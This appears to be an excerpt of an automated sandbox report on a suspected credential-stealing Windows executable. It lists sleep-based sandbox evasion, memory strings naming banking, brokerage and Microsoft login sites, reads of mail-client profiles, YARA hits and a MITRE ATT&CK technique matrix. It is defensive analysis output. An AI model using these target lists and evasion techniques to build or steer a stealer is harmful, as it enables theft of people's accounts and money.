Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595483s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -594500s >= -30000s	Jump to behavior

Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd64d42dcde309<
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	API call chain: ExitProcess graph end node			graph_0-4001
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	API call chain: ExitProcess graph end node			graph_0-3996

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Users\user\Desktop\hUMdKouQ1H.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hUMdKouQ1H.exe PID: 7952, type: MEMORYSTR

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	12 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	14 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement